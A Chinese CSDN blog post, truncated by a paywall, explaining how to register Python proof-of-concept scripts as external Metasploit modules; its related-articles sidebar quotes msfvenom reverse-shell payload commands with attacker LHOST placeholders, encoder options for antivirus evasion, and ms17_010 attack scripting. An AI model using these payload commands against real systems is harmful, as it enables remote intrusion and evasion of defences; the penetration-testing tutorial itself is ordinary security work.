将python扩展到msf中

最新推荐文章于 2023-05-19 20:01:01 发布
VIP文章 最新推荐文章于 2023-05-19 20:01:01 发布
阅读量535 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gao646467783/article/details/125091236
版权

前景需要:

msf框架提供了python的接口,并且网上有好多以Python写的渗透测试代码,尤其是exploit-da等漏洞库中,可不可以把网上的python代码稍稍改动一下放到msf中使用呢(假如根据同一套的逻辑重写一个的话,不仅要对ruby有一些理解,而且要费事的重写)?

一、想直接将python-poc加入msf框架中的话需要用特定的格式写python(from metasploit import module和metadata中要给出这个modul的type,因为支持的模板可能就那么几种,模板在/usr/share/metasploit-framework/lib/msf/core/modules/external/templates中),想打印出东西的话得用logging模块,这里不支持print语句;
二、写好python-poc(test.py)之后将其放在/root/.msf4/modules/下面,你的python是哪种类型的module(例’type’: ‘single_scanner’,在/usr/share/metasploit-framework/lib/msf/core/modules/external/templates找到相应的模板查看,例如single_scannerr的模板中有include Msf::Auxiliary::Scanner)那么你需要在/root/.msf4/modules/下面再创建一个auxiliary/scanner目录,并将python-poc放到里面;
三、启动msfconsole
四、加载所有的模块(运行reload_all命令)
五、如果将exploit-db里面的rb加载到msf中是相同流程;
六、github上的帮助文档链接:
扩展python)https://github.com/rapid7/metasploit-framework/wiki/Writing-External-Python-Modules
其他)https://github.com/rapid7/metasploit-framework/wiki/
七:例子:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# standard modules
import logging

# extra modules
dependencies_missing = False
try:
    import requests
except ImportError:
    dependencies_missing = True

from metasploit import module

metadata
最低0.47元/天 解锁文章
冷落残阳
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python调用msf_Python-实现与metasploit交互并进行ms17_010攻击
weixin_39947314的博客
11-30 323
关于ms17_010,可参考http://www.cnblogs.com/sch01ar/p/7672454.html目标IP:192.168.220.139本机IP:192.168.220.145# -*- coding:utf-8 -*-__author__ = "MuT6 Sch01aR"import osdef Handler(configFile,lhost,lport,rhost):c...
python调用msf_从python poc到metasploit模块
weixin_39521651的博客
11-30 731
metasploit5从metasploit开始引入了第三方模块,也就是说可以使用python来编写模块。并且可以加入主分支。得到最新版本由于kail等渗透系统并不是使用github上的最新版本,版本还在4.x。所以我们需要在github上下载git clone https://github.com/rapid7/metasploit-framework/将原来的msf配置文件复制到下载下来的文件...
MSF渗透测试之msfvenom提权之python
lza20001103的博客
04-05 3384
MSF渗透测试之msfvenom提权之python
给Metasploit 添加第三方模块进行漏洞验证
GodLordGee的博客
02-26 4304
问题描述 msf自带的模块已经很丰富了,但是,这并不能完全满足我们的需求,对于一些比较新的漏洞或者没有官方模块支持的漏洞,我们就只能自己写或者寻找网上大佬贴出的模块导入使用。但是怎么导入第三方模块让我浪费了一点时间,写在这里,方便自己以后查找。 参考链接          https://zhuanlan.zhihu.com/p/32509309 解决方法 1、创建相应...
Python脚本与Metasploit交互攻击
谢公子的博客
11-08 5504
Metasploit是一款强大的漏洞扫描和利用工具,编写Python脚本与Metasploit进行交互,可以自动化的扫描和利用漏洞。 相关文章:Metasploit框架的使用 在脚本,我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口,我们写了一个 findTarget() 函数,来扫描给定ip或者给定网段开放了目标端口的主机,返回开放了445端口的主机列表。445端口是作为...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
[ MSF ] Meterpreter扩展模块命令详解
Python实现远程调用MetaSploit的方法
12-23
(1)安装Python的msgpack类库,MSF官方文档的数据序列化标准就是参照msgpack。 root@kali:~# apt-get install python-setuptools root@kali:~# easy_install msgpack-python   (2)创建createdb_sql.txt: ...
通信与网络MSF基于组件的业务框架
11-14
例如,基于SIP的业务交互,相关ASC必须理解发送或接收的不同SIP消息特定的参数。  (2)媒体服务组件(MSC)  MSC用于与媒体通路的交互,MSC大多与媒体服务器有关,包括一些功能如文本到语音的转化、交互式...
基础电子MSF业务框架与IMS的关系
11-14
MSF和36PP对于在下一代网络快速有效... 由于有多个标准组织参与了IMS的发展和完善,如36PP、ETSITISPAN、ITU-T FGNGN等,目前业界对IMS的标准体系问题还存有一定的争议,因此,MSF宣布将GMl2006(2006年全球MSF互操
项目管理利刃之MSF
03-03
本文将结合MSF在项目管理的实际应用进行讲解,如果您是软件项目的参与者,如项目经理、开发工程师、系统架构师、顾问、质量管理人员等,想找到项目管理遇到问题的解决方案,相信本文会给您一定的帮助。MSF为成功...
python调用msf_MSF利用python反弹shell-Bypass AV
weixin_39883079的博客
11-30 1559
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=...
b3_python interact with metasploit(msf)
yeshankuangrenaaaaa的博客
01-07 305
python interact with Metasploit 参考资料 Python for Metasploit Automation 文翻译《Python for Metasploit Automation》 需要安装msgpack python模块,因为后面使用到的msfrpc模块依赖于这个模块,这两个模块的安装都可以使用源码安装的方式,因为pip install的方式如果失败的...
免杀对抗-MSF\CS-shellcode进行base64编码,python调用执行
m0_62172162的博客
04-25 489
免杀对抗-MSF\CS-shellcode进行base64编码,python调用执行
MSF 详解
最新发布
m0_72125469的博客
05-19 4279
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例
python 生成payload_msf生成payload
weixin_36472625的博客
01-14 590
payload分类:这里就分为正向木马和反向木马两类吧。咱知道的也有限,仅供参考...反弹式木马简介:反弹式shell(reverse shell)是一种从目标主机到攻击主机创建网络连接,并提供命令行shell的攻击载荷。显而易见的就是,反弹式木马是由攻击者上传到目标主机后,由目标主机运行和攻击者建立会话。因此,反弹式木马产生的会话更加不易被waf等安全设备拦截。正向连接木马简介:bind she...
python调用msf_使用python操纵metasploit简单小记
weixin_39900468的博客
11-30 1862
最近想做一款自动化的主机漏洞扫描工具。打算以python作为基础语言,metasploit作为开发基础库。查资料发现国内的论坛博客都只会互相抄来抄去,没一个能打的。那就我来写一篇。本文用到的python库是allfro/pymetasploit使用pip进行安装pip install pymetasploit我的开发环境是windows,metasploit跑在kali环境下。所以在kali下面要...
msfvenom常用payload
ITgougou_的博客
12-24 415
payload命令 windows: msfvenom-a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe mac: msfvenom-...
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4313
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用
Metaspolit结合Python使用
fnmsd的博客
12-25 2625
目录Msf结合Python使用python依赖库起手用法直接读写Console的用法(不推荐)使用module\jobs\sessions API进行操作额外的一点东西参考 Msf结合Python使用 python依赖库 pip install msgpack #SpiderLabs的那份的msfrpc库的call函数有点问题,我改了一下 wget https://raw.githubuser...
如何在msf连接psql数据库
05-02
在Metasploit Framework (MSF) 连接 PostgreSQL 数据库,请按照以下步骤操作: 1. 确保已安装并启动了 PostgreSQL 数据库。 2. 打开终端并输入以下命令以启动 Metasploit Framework 控制台: ``` msfconsole ``` 3. 在控制台,输入以下命令以连接到 PostgreSQL 数据库: ``` db_connect postgres://username:password@host:port/database ``` 其,`username` 是 PostgreSQL 用户名,`password` 是该用户的密码,`host` 是 PostgreSQL 服务器的 IP 地址或主机名,`port` 是 PostgreSQL 服务器的端口号(默认为 5432),`database` 是要连接的数据库名称。 例如,如果要连接到本地 PostgreSQL 数据库,用户名为 `postgres`,密码为 `password`,数据库名称为 `msf_database`,则输入以下命令: ``` db_connect postgres://postgres:password@localhost:5432/msf_database ``` 4. 如果连接成功,则可以使用以下命令测试连接: ``` db_status ``` 这将显示与数据库的连接状态。 现在你可以在 MSF 使用 PostgreSQL 数据库了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值